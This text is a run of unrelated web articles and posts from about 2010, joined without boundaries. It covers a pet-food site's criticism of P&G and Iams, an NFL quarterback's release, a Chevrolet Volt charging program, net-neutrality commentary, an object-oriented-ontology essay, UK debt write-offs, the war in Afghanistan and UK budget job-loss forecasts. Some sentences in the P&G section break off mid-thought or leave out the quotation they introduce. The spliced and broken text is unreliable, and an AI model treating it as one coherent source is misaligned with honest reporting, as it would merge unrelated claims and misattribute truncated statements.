As of mid 2010 , it is the sixth most profitable corporation in the world , and the fifth largest corporation in the United States -- surpassed only by Apple , Exxon Mobil , Microsoft , and Walmart .
P&G is the world ’s largest manufacturer of household products , with about 23 brands sold in 140 countries worldwide .
Its bounty of products includes : Pampers , Tide , Oral - B , Duracell , Pringles , Olay , Head & Shoulders , Wella , Gillette , Ariel , Always , Whisper , Pantene , Mach3 , Bounty , Dawn , Gain , Charmin , Downy , Lenor , Crest , Braun , Fusion ... Iams and Eukanuba -- and now , Natura Dog Foods !
Additionally , P&G has owned more than 20 soap operas in the past 80 years , including the CBS productions , “ Guiding Light ” and “ As the World Turns ” ( both cancelled in 2009 ) .
In 2007 , according to the Nielsen Company , P&G spent $ 2.62 billion on U.S. advertising .
Not only is this more than any other company , but it ’s almost twice as much as the next company on the Nielsen list , General Motors .
Globally , P&G spends around $ 7 billion on advertising each year .
In January 2010 , the Company announced the testing of an online retail outlet , in order for P&G to sell their products directly to U.S. consumers .
It will be telling to see if and when Natura Dog Food will be added to their catalogue ?
In 1999 , P&G purchased the Iams Company , which included the Eukanuba dog food brand , for $ 2.3 billion .
Prior to the buyout , Iams was a respectable family owned and operated dog and cat food company .
Iams and , Eukanuba in particular , were a cut above other mass market dog food brands , and were only available through specialty pet stores and veterinary clinics .
( Note , one can't compare their original foods with the quality of our present products , as premium all natural dog food , as we know it today , did not exist in the 1990s ) .
Shortly after the acquisition , P&G expanded both Iams and Eukanuba to the mass market , making it widely available in supermarkets and retail stores such as Costco , K - Mart and Walmart , across the globe .
Within months of the takeover , it became very apparent that changes had been made to the formulation of the foods .
There were numerous accounts of dogs and cats suddenly developing various health issues and dog food allergies -- from diarrhea to intense itching , brittle and poor quality coats , skin rashes , hot spots , and even blown coats .
The packaging remained unchanged , and no notification was given to retailers , pet owners or vets .
( Note : Pet food companies are not required to list ingredient changes on dog food labels for 6 months -- a legal loophole for P&G ) .
After much publicity and a huge public backlash , P&G admitted to switching ingredients from rice to barley , but denied making any other formula changes .
They went as far as adding a PR page to their website in an attempt to dispel what they referred to as " rumors " , and insisted they were continuing to use the same quality ingredients as before !
In April 2000 , P&G implemented another strategy in an attempt to further reassure the public of their - and that -.
They convened an independent seven - member panel , known as the Iams Quality Review Board , consisting of veterinarians , breeders , research nutritionists and pet specialty store owners .
The members met at the Company 's Ohio plant to observe and review the manufacturing process and analyze and compare ingredients lists against product samples obtained over the past twelve months .
The report with its glowing conclusions was flaunted on their websiteP&G was later sued by Nutro and Kal Kan Pet Food Companies for false advertising and misleading labels , plus a class action lawsuit on behalf of consumers was settled by the California law firm , Wasserman , Comden , Casselman & Pearson .
The lawsuit brought to light that in reality , Iams had Thus , with the substitution of cheaper quality ingredients and reducing recommended feeding amounts by 25 % , these " premium " foods could now compete price - wise with grocery store dog food .
In truth , Iams and Eukanuba dog foods had effectively now become poor quality supermarket pet foods parading their fancy dog food labels and exploiting the Iams and Eukanuba brand names .
Perhaps even more telling is that P&G and the FDA filed motions to keep correspondence between them secret and unavailable for evidence in the lawsuits .
Copies were obtained under the Freedom of Information Act , which disclosed that Iams and Eukanuba 's dog foods did not meet AAFCO standards even though the AAFCO stamp of approval appeared on the label .
Washington Post article on Nutro's 2002 lawsuit against Iams .
Will history repeat itself with Natura Dog Food ?
Until recently , P&G also manufactured branded pharmaceutical drugs , including Actonel , an osteoporosis medication , and Enablex , a medication for overactive bladder .
Annual sales were around $ 2.3 billion .
It sold its pharmaceutical division to Warner Chilcott on October 30 , 2009 .
In a true David and Goliath story , a Senior Medical Professor at Sheffield University in Britain , Dr. Aubrey Blumsohn , went to battle with P&G accusing the Company of denying him access to key data while attempting to ghost write papers with his name on it .
The University , influenced by the millions of dollars of research grants from P&G , made attempts to bar the Professor from " whistle blowing " P&G 's efforts to conceal data and manipulate research conclusions .
www.guardian.co.uk
After four years of
In 2002 and 2003 , PETA ( People for the Ethical Treatment of Animals ) conducted an undercover investigation at Sinclair Research Center , a laboratory contracted by Iams Pet Food .
The investigation uncovered horrendous , inhumane acts of cruelty to dogs and cats .
The investigator found dogs who had literally gone crazy from intense confinement in barren , steel cages and cement cells .
The purpose of the " research " was to observe the effects of solitary confinement on a dog !
Many dogs were debarked , while others were left on a filthy floor after chunks of muscle had been hacked from their thighs .
Many extremely sick dogs and cats were simply left lying neglected in cages , dying slowly and painfully , alone .
No veterinary care or pain relief was provided .
Iams representatives toured the facility , witnessed the events and ... turned a blind eye !
The U.S. Department of Agriculture ( USDA ) investigated PETA 's complaint and cited the laboratory for about 40 violations of the Animal Welfare Act.
Sinclair paid a penalty of $ 33,000 .
P&G denied any involvement in the scandal .
However , once again , after intense publicity and extreme pressure from PETA , P&G 's public relations machine went into damage control .
They agreed to begin conducting in - home tests for food and nutrition experiments and even built a separate website designed to explain P& G 's version of the " facts " .
On another occasion , Iams / Eukanuba also fought the release of information from a university study in which a painful disease was induced in dogs .
“ The lesson learned here is that kennel studies are not an appropriate way to test feeding guidelines because most kennels represent a high - stress … environment .
Naturally , in such an environment , dogs may need to consume more food than they would in a home setting . ”
.
In a 2001 Petfood Industry Electronic Newsletter , Diane Hirakawa ( Senior Vice President of Iams ’ Research & Development ) makes an admission , stating , However , Iams allegedly still keeps up to 700 dogs in their Dayton , Ohio laboratory for non-invasive nutritional studies .
It refuses to give PETA representatives access to the lab and also refuses to end invasive experiments on non dog and cat studies .
See below for the shocking PETA video .
Warning :
This video is extremely graphic and absolutely heartbreaking !
The Future of Natura Dog Food - Our Thoughts
What Do YOU Think the Future Holds for Natura Dog Food ?
You are here : Home > Dog Food Comparison Chart > Natura Dog Food
ALAMEDA , Calif . --
The Oakland Raiders released former No. 1 overall pick JaMarcus Russell on Thursday , ending a three - year tenure marked by his high salary and unproductive play on the field .
Senior executive John Herrera told The Associated Press about the move and said that " we wish him well . "
The decision came less than two weeks after Oakland acquired Jason Campbell from Washington to take over at quarterback and signifies that owner Al Davis finally lost patience with the immensely talented but unproductive player he drafted first overall in 2007 against the wishes of former coach Lane Kiffin .
Russell will now likely be considered one of the biggest draft busts in NFL history , joining Ryan Leaf , Ki-Jana Carter , Akili Smith and others on that list .
He will have been paid more than $ 39 million by the Raiders , while producing only seven wins as a starter .
Russell showed up at last week 's minicamp , saying he would keep coming to work until told otherwise .
He looked decent in the first of five practices last weekend but got less work as the weekend went on and the decision to cut ties was finally made .
The Raiders paid Russell more than $ 36 million through last season .
They still owe him $ 3 million more but saved $ 6.45 million by not having him on the roster in 2010 .
" Sometimes certain expectations are n't met , and certainly there 's an opportunity for a young athlete to continue to get better , " Les Miles , Russell 's coach at LSU , told the New Orleans Times - Picayune for Friday 's editions .
" It 's only my hope the opportunity for JaMarcus to land with a team that will invest in him and give him the opportunity to continue to develop .
" I do n't know the situation at Oakland .
I would have expected him to have success early and late .
Sometimes that does n't work .
Sometimes a guy needs more time to develop . "
Since the start of the common draft in 1967 , only one other No. 1 pick was released this quickly in his NFL career .
Indianapolis cut 1992 top pick Steve Emtman after three seasons but that was more because of injuries than production .
Emtman played three more seasons for Miami and Washington .
It remains to be seen whether any team will give Russell another shot .
Enlarge Chevrolet
A pre-production Chevrolet Volt electric vehicle with extended range on display at Columbia University on Earth Day in New York City , DETROIT  Early buyers of the Chevrolet Volt electric car could receive a free home - charging station through a U.S. Department of Energy program , General Motors said .
The Volt goes on sale late this year , and 4,400 customers will be eligible for a 240 - volt charge station from ECOtality or Coulomb Technologies .
In many cases , it will include the cost of home installation .
It 's all being paid for through the American Recovery and Reinvestment Act .
" Many owners will plug their Volt into a normal 120 - volt electrical outlet , charge overnight and drive to work in the morning using only battery power , " Tony DiSalle , product and marketing director for the Chevrolet Volt , said Thursday in a statement .
" For Volt owners who want to install a faster 240 - volt charge station , we expect the Department of Energy project to save $ 1,000 to $ 2,000 . "
The program will collect data from customers to learn about average charge times and time of use so that the Energy Department can better understand how electric vehicles are used .
GM has said the Volt will be able to go 40 miles on an electrical charge alone .
After that , an onboard gasoline generator will provide power to recharge the batteries and keep the vehicle going .
Tony Posawatz , Volt vehicle line director , said a 240 - volt charger will recharge the car in about four hours .
He said some of the program 's engineers already have installed 240 - volt outlets to charge test versions of the Volt at home .
" These guys would never use any gas on the weekends unless they would drive the Volt up north , " he said .
" We 're learning through the whole process that the charging experience is important to us . "
Meanwhile , electric and hybrid vehicles are expected to help increase the sale of global alternative - fuel vehicles by 28 % this year compared with last , according to a new report by J.D. Power and Associates .
That outpaces an expected 8 % industrywide increase this year .
As U.S. sales rebound , J.D. Power expects the U.S. market to account for 55 % of hybrid sales in 2015 .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
Murph and Dobbs make an appearance today , even though Wes was smashing balls while Tony found electronic love .
“ Just because the police treat black men as more criminal than white men , it does not mean that they are . ”
Simon Woolley , speaking as the director of the Operation Black Vote pressure group , but who is also a commissioner on the Equality and Human Rights Commission , said : “ Although the charge rates for some criminal acts amongst black men are high , black people are more than twice as likely to have their cases dismissed , suggesting unfairness in the system . ”
Rain drum is an innovative umbrella that features drums with various kinds of sound outputs , making the most interesting amusement for user during rainy days .
When playing a drum , the hi-hat , crash and tom - tom needs a high frequency of drumstick play to make the range bigger , whereas , the bass and snare requires a lower frequency for a smaller range of sound .
To meet these requirements , the shade of the umbrella contains five wax cloth made shades with different elasticity that makes different sounds with the fall of every raindrop .
Designer : Dong Min Park
* Some of our stories include affiliate links .
If you buy something through one of these links , we may earn an affiliate commission .
-- Tim Karr , in " The Fate of the Internet --
The Fate of the Internet -- Decided in a Back Room
The Wall Street Journal just reported that the Federal Communications Commission is holding " closed - door meetings " with industry to broker a deal on Net Neutrality -- the rule that lets users determine their own Internet experience .
Given that the corporations at the table all profit from gaining control over information , the outcome wo n't be pretty .
The meetings include a small group of industry lobbyists representing the likes of AT&T , Verizon , the National Cable & Telecommunications Association , and Google .
They reportedly met for two - and - a - half hours on Monday morning and will convene another meeting today .
The goal according to insiders is to " reach consensus " on rules of the road for the Internet .
This is what a failed democracy looks like :
After years of avid public support for Net Neutrality - involving millions of people from across the political spectrum - the federal regulator quietly huddles with industry lobbyists to eliminate basic protections and serve Wall Street 's bottom line .
We 've seen government cater to big business in the same ways , prior to the BP oil disaster and the subprime mortgage meltdown .
The Obama administration promised to embrace a new era of government transparency .
It 's the tool we were supposed to use to pry open policymaking and expose it to the light of public scrutiny .
In that spirit , President Obama pledged to " take a backseat to no one " in his support for Net Neutrality .
He appointed Julius Genachowski to head the FCC -- the man who crafted his pro-Net Neutrality platform in 2008 .
But the mere existence of these private meetings reveals to us a chairman who has fallen far short of expectations .
Instead Genachowski is shying from the need to fortify the Internet 's open architecture in favor of deals made between DC power brokers .
These deals will determine who ultimately controls Internet content and innovation .
Will phone and cable companies succeed in their decade - long push to take ownership of both the infrastructure of the Internet and the information that flows across its pipes ?
Will they cut in a few giant companies like Google and the recording industry to get their way ?
Whatever the outcome , the public - including the tens of millions of Americans who use the Internet every day and in every way - are not being given a seat at the table .
Genachowski's closed - door sessions come after six months of public comments on whether the agency should proceed with a rule to protect Net Neutrality .
During that period , more than 85 percent of comments received by the agency called for a strong Net Neutrality rule .
Look at it this way :
If a candidate received more than 85 percent of the vote , would n't she have a mandate to decide on the public 's behalf ?
In Chairman Genachowski's alternative view of reality , though , the public is immaterial , and industry consensus supreme .
#
I know I said last night I was probably going to add some further thoughts to Howie 's post today on the secret shenanigans of the deficit commission , but that will have to wait , now that it appears the administration has back rooms going all over the District of Columbia where the hard - earned treasure of Americans is being handed over to corporate special interests under the White House 's unannounced but seemingly in - full - swing Right - Wing " Centrist " Giveaway Program .
I doubt that the administration back - doorkeepers are so crass as to demand payment from the corporate negotiators as they enter their particular back room .
Probably it can be assumed they 've all already paid for their dealing privileges .
Our friend Tim Karr , campaign director of Free Press and our go - to guy on all matters Net Neutrality - related , has an important post up at HuffPost : Tim says , " The Industry 's regulatory capture of the Internet is now almost complete , " with " the one agency tasked with oversight of communications [ thinking ] it can wriggle free of its obligation to protect the open Internet , if only it can get industry to agree on a solution .
" Meanwhile , Congress appears already at work onsellout -- " this is the same Congress that is bankrolled by the phone and cable lobby in excess of $ 100 million . "
( Tim took a closer look at the congressional sellout in a post last month , " Will Dirty Politics Kill the Internet ? " ) " Why , " Tim asks , " is this so startling even for the more cynical among us ? "
Labels : Barack Obama , FCC , lobbyists , net neutrality
Of the laws of nature on which the condition of man depends , that which is attended with the greatest number of consequences is the necessity of labor for obtaining the means of subsistence , as well as the means of the greatest part of our pleasures .
This is no doubt the primary cause of government ; for if nature had produced spontaneously all the objects which we desire , and in sufficient abundance for the desires of all , there would have been no source of dispute or of injury among men , nor would any man have possessed the means of ever acquiring authority over another .
The results are exceedingly different when nature produces the objects of desire not in sufficient abundance for all .
The source of dispute is then exhaustless , and every man has the means of acquiring authority over others in proportion to the quantity of those objects which he is able to possess .
In this case the end to be obtained through government as the means , is to make that distribution of the scanty materials of happiness which would insure the greatest sum of it in the members of the community taken altogether , preventing every individual or combination of individuals from interfering with that distribution or making any man to have less than his share .
British soldiers in Afghanistan are " horribly over - extended " and being killed for " no good reason " , a senior military figure admitted last night .
He said talks are now under way with US commanders that would pave the way for Britain to begin scaling down its commitment to the war , bringing about a change of emphasis in its deployment .
Britain 's 10,000 - strong force is suffering " appalling " casualty rates and is set to be given a break from the worst of the fighting , according to the source .
" The Americans know the Brits have been giving more than they can afford , and agree that they should be kept out of harm 's way as far as possible .
But McChrystal [ the American commander of international forces in Afghanistan ] is keen to have the input of some ground troops and special forces , " the source said .
" Essentially , the Americans know we are broke and we are getting blokes killed for no good reason .
Whatever the MoD says , it absolutely is n't business as usual . "
He added : " The problem is that the Afghan troops are not yet ready to take over , and training them up is not something the Afghan government can afford . "
And the reputation of British forces is suffering .
The source told the IoS that one senior figure in the International Security Assistance Force ( Isaf ) had commented recently : " There is no point in sending British troops into places where they need helicopters , because they ain't got 'em . "
With the Ministry of Defence facing a £ 36bn budget black hole over the next decade and savage cuts likely under the defence review , politicians are warning that the war has become financially untenable .
" It is unsustainable for this number of troops to be in Afghanistan and Pakistan for an indefinite period .
The forces just are n't large enough , and I know the Secretary of State for Defence is more than aware of this , " said the Conservative MP Patrick Mercer .
So far this year , 41 British soldiers have been killed in action and 137 seriously wounded , with hundreds more admitted to hospital .
The US will continue to take on the bulk of the burden in Afghanistan , and the next few months will be a tipping point .
Fighting is set to intensify as coalition forces try to retake the Taliban stronghold of Kandahar in what commanders are calling the " most difficult and most important " operation since the war began .
Their success , or failure , will be crucial in determining whether President Barack Obama carries out his stated intention of reducing US forces from 2011 .
Yesterday insurgents made their third major attack on Nato forces within six days , firing at least five rockets into Kandahar air base and launching a ground assault – a rarely employed tactic – on the perimeter fence .
Firing continued for several hours .
On Tuesday , a suicide bomber attacked a Nato convoy in Kabul , killing six soldiers , and on Wednesday dozens of Taliban militants , some clad in suicide vests , sustained an assault upon Bagram airfield , the main US base in Afghanistan , for eight hours .
A shift in UK government policy was outlined by Liam Fox , the Defence Secretary , on Friday , when he said that Britain was not a " global policeman " , that he would like to see troops return " as soon as possible " , and that Britain needs to " reset expectations and timelines " .
He added : " We are not in Afghanistan for the sake of the education policy of a broken , 13th - century country .
We are there to see our global interests are not threatened . "
The comments are a clear statement of intent , according to General Sir Hugh Beach , former deputy commander of British land forces .
" Words like ' timelines ' and ' expectations ' – if that is n't a clear message that we 're planning to get out early then I do n't know what would be . "
Lord Bramall , a former chief of the defence staff , said : " I think it is the beginning of the end , but it is a question of how long it takes .
The Americans are talking about a review and a possible run-down in about a year .
If they start withdrawing , we 'll consider we 're in the clear to do the same . "
But it is premature to talk about withdrawal until there is military success , according to Colonel Bob Stewart .
" Once we have mastery of the situation , then we can start thinking about an endgame , but we 're not there yet . "
Mr Fox , William Hague , the Foreign Secretary , and Andrew Mitchell , the International Development Secretary , arrived in Afghanistan yesterday for talks with Hamid Karzai , the Afghan President , and General Stanley McChrystal .
Speaking yesterday , Mr Fox clarified his earlier remarks : " What I was pointing out is that the primary reason for sending our armed forces to Afghanistan was one of national security ...
But , clearly , if we are to make the long - term gains that will provide the stability to maintain the momentum when our armed forces eventually hand over to Afghan forces , we will require a long period of development in concert with the international authorities , the NGOs and our and other countries ' aid programmes . "
He refused to set a timescale , but added : " When you 're looking at one of the poorest countries in the world , the help it will require will be over a very long period indeed . "
Tension is rising in Afghanistan , with the Taliban stepping up its actions as summer approaches , when fighting reaches its peak .
Yesterday Afghan police uncovered a cache of almost 300 rockets outside Kabul .
While military success in Afghanistan remains in the balance , neither Britain nor the US is in control of the two key factors on which ultimate success rests : a reduction in the corruption that plagues President Karzai 's regime , and the country 's ability to sustain the hundreds of thousands of police and soldiers that will be needed to secure its stability .
Killed in action : 286th British soldier dies in Afghanistan
Continued from here .
Epistemology
Onticology , like all variations of object - oriented ontology , is realist in its orientation .
In defending a realist ontology onticology holds that the vast majority of objects , actants , beings , or entities are independent of humans and are what they are regardless of whether any humans regard them or register them .
In short , onticology rejects any anthropomorphic , idealist , or anti-realist thesis to the effect that to be is to be the correlate of mind , spirit , the body , the human , language or otherwise .
While it is certainly the case that knowledge is necessarily dependent on the object to which it relates , the converse does not hold true .
Objects are not dependent on being known , regarded , perceived , or spoken about .
As such , and to put it in Aristotlean terms , knowledge is an accident of objects , not objects an accident of knowledge .
As Althusser so nicely puts it , “ [ n ] o doubt there is a relation between thought - about - the - real and this real , but it is a relation of knowledge , a relation of adequacy or inadequacy of knowledge , not a real relation , meaning by this a relation inscribed in that real of which the thought is the ( adequate or inadequate ) knowledge ” ( Reading Capital , 96 ) .
Althusser goes on to remark that “ [t ] he distinction between a relation of knowledge and a relation of the real is a fundamental one : if we did not respect it we should fall irreversibly into either speculative or empiricist idealism ” ( ibid . ) .
Onticology categorically endorses Althusser ’s verdict .
It is a fundamental necessity to distinguish between those relations that belong to the object and those that belong to knowledge .
Contemporary philosophy continuously confuses these two very different sorts of relations .
Naturally the question arises of how it is possible to surmount our relation to the object so as to determine whether objects themselves possess the properties we encounter in relating to objects .
In other words , given that we can only ever relate to the object in relating to the object how is it possible to surmount this relation to get at the being of the object itself ?
Much more will have to be said about this later– and the answers will be surprising with respect to standard prejudices about realism –however , for the moment it can be said that onticology takes its epistemological inspiration from the transcendental realism of Roy Bhaskar .
Among other things , Bhaskar sought to provide a transcendental grounding for the sciences .
Insofar as onticology defends the thesis that the field of being is much more vast than the field of objects investigated by the natural sciences , it parts way with the thesis that the domain of being is exhausted by the domain of natural objects .
However , the general form of Bhaskar ’s argument holds for our realist purposes .
read on !
A transcendental argument seeks to elucidate the conditions under which certain acknowledged practices and forms of cognition are possible .
Kant , for example , asked what must be the case for mathematical judgments to be possible .
How is it both that we are able to extend our knowledge , as if by magic , through mathematical judgments and , more significantly , that these judgments are able to provide genuine knowledge of the world despite the fact that these forms of reasoning are not based on experience ?
Part of Kant ’s argument consisted in claiming that mind imposes the forms of space and time on the data of experience .
In other words , space and time are not attributes of being itself but rather of the mind that regards being .
Insofar , Kant argues , as mathematics is ultimately a rumination on the nature of space and time taken in their most abstract form and insofar as the mind imposes space and time on the manifold of sensation , it thus follows that a priori judgments about the nature of spatio - temporal relations are possible that anticipate the structure of actual - space times without directly experiencing these space - times .
Why ?
Because any manifold of sensation must necessarily be structured by these forms imposed by intuition .
These arguments are well known so I only gloss them to remind readers of the nature of transcendental argument .
These arguments come in many flavors .
Thus , for example , when Saussure seeks to investigate the being of language and distinguishes between langue and parole he is making a transcendental argument to account for speech or the conditions under which certain speech acts are possible within a particular language .
Langue or the synchronic system of signifiers is the condition under which parole or speech is possible .
Here Saussure ’s particular version of transcendental argument differs from Kant in two ways :
First , langue is culturally and historically variable , whereas Kant ’s a priori categories and forms of intuition are invariant , unchanging , and universal across culture .
Second , Kant ’s a priori forms of intuition and categories of the understanding are imposed by mind , albeit in the form of transcendental subjectivity , whereas Saussure ’s langue is a collective structure that belongs to no subject in particular .
What both thinkers share in common is the recognition that it is necessary to have recourse to conditions that are not themselves given in the given but which are nonetheless that through which or by which the given is given .
In the case of Saussure it is taken as given that we speak and communicate .
That is not disputed .
The transcendental question is how this is possible .
Likewise , in Kant , it is taken as given and beyond dispute that we make mathematical judgments , that these judgments apply to the manifold of intuition and are not just fictions or webs spun by a spider with no correlate in the world .
The transcendental question is how this is possible .
To answer these questions we need to have recourse to something other than the given or experience .
So too in the case of Bhaskar .
Bhaskar asks how science is possible and why , in particular , we must have recourse to experiment in science .
As such , Bhaskar is engaged in a transcendental inquiry .
However , what distinguishes Bhaskar ’s transcendental inquiry so much from prior transcendental inquiries is that it does not have recourse to mind , culture , language , or the human in formulating its answer , but rather to the world .
In effect , Bhaskar asks not what our minds must be like for science to be possible , but rather , in a jaw dropping and audacious move , what the world must be like for science to be possible .
In short , if our science is to be possible– and since it is actual we know that it is possible – the world must be a particular way .
And this way in which the world must be is intimately linked to the fact that we must engage in experiment in order to conduct our science .
Bhaskar outlines two general features that the world must have in order for 1 ) our science to be possible , and 2 ) to explain why experiment is necessary .
Let us take the second question first .
Why is experiment necessary ?
If the empiricists were right and all our knowledge originated in sensation then we would be hard put to explain why experiment is necessary .
Here it is noteworthy that Kant fully takes over the empiricist line of thought which holds that knowledge must be grounded in sensation .
Rather , if experiment would be superfluous , then this is because it would be sufficient to simply observe nature passively and link the appropriate sensations , whether through a priori categories as in the case of Kant or modes of association as in the case of Hume .
No , if experiment is indispensable , then this can only be because objects do not manifest their powers or capacities under ordinary conditions .
Objects do not manifest or “ give ” their powers under ordinary conditions .
Rather , it is only under the highly structured and isolated conditions of the experimental setting that we are able to encounter– or better yet , dis - cover – the powers that lie within objects .
As a consequence , passively given sensations are not the origin of knowledge .
Ontologically , then , the condition under which experiment is both possible and necessary is only in a world where objects can act without manifesting their act in either nature or for a perceiving subject .
As such it is necessary to distinguish the being of objects from the manifestation of objects .
While objects are acts , these acts are not identical with their performance in either nature ( events where no humans are about to perceive them ) or with their performance for humans .
Rather , the proper being of the object is not its performance or manifestation , but the generative mechanism that serves as the condition under which these performances or manifestations are possible .
As Graham Harman will argue– though in a very different theoretical constellation – the being of objects is essentially withdrawn or hidden .
No one has ever perceived a single object , but we do perceive all sorts of effects of objects .
Traditional epistemology has confused these effects with the objects themselves .
Fortunately we do occasionally manage to cognize objects through a sort of detective work that infers these generative mechanisms from their effects ; without , for all this , ever exhausting the infinity of a single object .
At any rate , if objects were not withdrawn in this way , the practice of experiment would be unintelligible .
This leads to Bhaskar ’s answer to the first question :
What must the world be like for science to be possible ?
Note , this is not a question about mind or culture , but about the world itself , regardless of whether or not humans exist .
Once again , knowledge is an accident of objects , not objects an accident of consciousness or cognition .
If science is to be possible– and I would argue , if any human practice is to be possible –then the world must be structured and differentiated .
The world must have joints or , as Harman puts it , the world must be composed of “ chunks ” .
Why is this the case ?
Let us return to the question of experimentation and the conditions under which experiment is possible .
We will adopt two possible hypotheses pertaining to the ontological nature of the world independent of humans :
1 ) As certain mystics and contemporary crypto-mystics would have it , the world is an undifferentiated One - All that is only subsequently segmented or partitioned into discrete beings by some form of human agency whether this be through cognition or language ( in the case of language we might think of Saussure ’s and Hjelmslev ’s undifferentiated “ sonorous matter ” ) .
2 ) Entities are the sum totality of their relations to all other entities in the universe .
The first hypothesis is easily dispatched on two grounds : First , this hypothesis fails to register the contradiction in its own utterance .
At the level of explicit content , it claims that the world is an undifferentiated One - All that is only subsequently segmented into discrete beings , yet what it misses at the unconscious level of its own utterance is that it registers at least one structured differentiation that is not undifferentiated within this One - All : Namely , the agency through which the One - All subsequently comes to be differenciated .
Certain anti-realist , transcendental philosophers will , in a gesture that is all too cute , claim that the agency by which the world is segmented cannot properly be said to exist , thus attempting to resolve this contradiction through a sleight of hand .
However , as Meillassoux has shown in After Finitude , all attempts on the part of transcendental anti-realist philosophies to treat the transcendental subject as a non-existing or non-objectile agency that does not itself exist end up , all too clearly , attaching that conception of finitude and the segmentary work with which it is charged to the body ( a differentiated being or generative mechanism ) .
Second , suppose the anti-realist transcendental philosopher were to convince us through his appeals to the non-existence of the transcendental , would we still encounter problems ?
Like Atlas , transcendental subjectivity is charged with the monumental task of segmenting the formless apeiron of the One - All from out of primal chaos into a supremely segmented world .
But this world appears to us to be too slippery for even a titan like Atlas to grasp .
Were the world , prior to and independent of humans genuinely a formless apeiron it would contain no differences providing hand - holds for Atlas to grasp in his segmenting activity .
Consequently , no segments could ever come into being .
Yet everywhere we encounter segments , so the world must not be a formless One - All , but must rather be structured and differentiated even if structure and differentiation are transformed in their encounter with the human .
With this first hypothesis dispatched , let us investigate the second .
The being of entities consists entirely of their relations to all other entities .
Suppose , however , this were the case .
Were this true then it would not be possible to form the closed systems necessary for experimental practice as it would be impossible to ever isolate an object or generative mechanism from the open system that leads to the covering of its generative powers .
Yet we do engage in experiment and therefore do isolate generative mechanisms .
While it might be the case that no generative mechanism is ever completely isolated from relations to other entities , it nonetheless follows , in principle , that objects are independent of their relations .
Thus , while onticology readily recognizes that objects enter into relations , nonetheless onticology rejects the ontological thesis that objects are their relations .
As Harman has noted , all sorts of ontological implications and questions follow from this thesis of a relationless object .
Note , then , how Bhaskar has inverted the nature of transcendental question and even epistemology itself .
The transcendental belongs not to the mind , culture , or language ( though in certain instances , yet to be discussed , it will ) , but rather is a property of the world itself .
Moreover , it is ontology that is the condition of epistemology , not the reverse .
The world must be a certain way in order for knowledge to be possible and these ontological conditions cannot be swallowed by an epistemological reduction to questions of what is given for or to consciousness .
Moreover , one condition under which epistemology is possible is that of a world in which humans do not exist .
This is a dramatic way of asserting that these are properties or features of being itself , not the relation of the human to being .
Now , Bhaskar ’s meditations are concerned with the ontology required for science to be possible .
With these epistemological trivialities out of the way I hope to show that the form of this argument extends much further than the natural beings or generative mechanisms investigated by the sciences .
But that investigation will have to await future posts .
Credit card rates have been rising for borrowers
The level of debts written off because defaulting borrowers will never repay them shot up in 2009 , Bank of England figures have shown .
In 2009 , financial institutions wrote off £ 4.12bn in credit card loans , up from the previous record amount in 2008 of £ 3.2 bn .
The value of mortgages written off more than doubled , but from a lower level , from £ 408 m in 2008 to £ 984 m in 2009 .
The figures reflect the effect of the recession on personal debts .
Unrecoverable
Other loans written off jumped from £ 3.2 bn to £ 4.2 bn - pushing up the total write - offs by UK lenders to people from £ 6.9 bn to £ 9.3 bn .
In addition to this , financial institutions wrote - off £ 5.9 bn that was lent to non-financial businesses , as well as £ 154 m lent to other financial corporations .
Banks have been revealing their own specific write - off levels during the current reporting season .
These institutions set aside millions of pounds to cover potential losses on their loans , but only when the loss is confirmed as unrecoverable is the money finally written off .
The effect of the increased losses has been felt by those people who borrow but make repayments on time .
It became more difficult during the recession for first - time buyers to get on the property ladder as lenders were making their criteria more stringent .
Last month , financial information service Moneyfacts said that credit card rates had risen to their highest level for 12 years - at 18.8 % .
Bank of England figures suggested the rise was not so acute .
It said the average interest rate on credit cards offered by banks and building societies has risen to its highest level since June 2006 .
At the end of January , the rate was 16.4 % .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Dancehall artiste Jahmiel brings something special to the table with “ Imperfection . ”
An honest track where the artist opens up about his flaws and the struggles
I did not want to offend the UFC in any way .
What I meant is , I do n't like to watch fights in general .
My main concern is what kind of culture I bring , myself .
...
It has always been for me that some fighters would appear and people would want to see me in matches against these fighters .
That will always happen .
As for the UFC , when my contract with Strikeforce is over - I have two fights left on my contract - the UFC will have the time and the opportunity to prepare and offer a contract that may be interesting to me .
George Osborne 's austerity budget will result in the loss of up to 1.3 m jobs across the economy over the next five years according to a private Treasury assessment of the planned spending cuts , the Guardian has learned .
Unpublished estimates of the impact of the biggest squeeze on public spending since the second world war show that the government is expecting between 500,000 and 600,000 jobs to go in the public sector and between 600,000 and 700,000 to disappear in the private sector by 2015 .
The chancellor gave no hint last week about the likely effect of his emergency measures on the labour market , although he would have had access to the forecasts traditionally prepared for ministers and senior civil servants in the days leading up to a budget or pre-budget report .
A slide from the final version of a presentation for last week 's budget , seen by the Guardian , says : " 100 - 120,000 public sector jobs and 120 - 140,000 private sector jobs assumed to be lost per annum for five years through cuts . "
The job losses in the public sector will result from the 25 % inflation - adjusted reduction in Whitehall spending over the next five years , while the private sector will be affected both through the loss of government contracts and from the knock - on impact of lower public spending .
The Treasury is assuming that growth in the private sector will create 2.5 m jobs in the next five years to compensate for the spending squeeze .
Osborne said in last week 's speech that tackling Britain 's record peacetime budget deficit would help keep interest rates low and boost job creation .
" Some have suggested that there is a choice between dealing with our debts and going for growth .
That is a false choice . "
However , investors are increasingly nervous about the lack of growth in the world economy .
The FTSE 100 fell more than 3 % yesterday as fresh jitters hit confidence .
The opposition and trade unions said the unpublished Treasury forecasts backed up their argument that the unprecedented scale of the cuts in public spending would hamper Britain 's recovery from the deepest and longest recession since the Great Depression .
Alistair Darling , the shadow chancellor , said : " Far from being open and honest , as George Osborne put it , he failed to tell the country there would be very substantial job losses as a result of his budget .
" The Tories did not have to take these measures .
They chose to take them .
They are not only a real risk to the recovery , but hundreds of thousands of people will pay the price for the poor judgment of the Conservatives , fully supported by the Liberal Democrats .
It shows the risks they are prepared to take .
If they get it wrong , those people losing their jobs will not get back to work . "
Osborne said last week that his newly appointed panel of outside experts – the Office for Budget Responsibility – believed the jobless rate would soon start to improve .
" The unemployment rate is forecast by the Office for Budget Responsibility to peak this year at 8.1 % and then fall for each of the next four years , to reach 6.1 % in 2015 , " he said .
This forecast was fleshed out in the Treasury 's Red Book , which says : " The decline in employment appears to be coming to an end and we expect a modest recovery in employment in the second half of 2010 . "
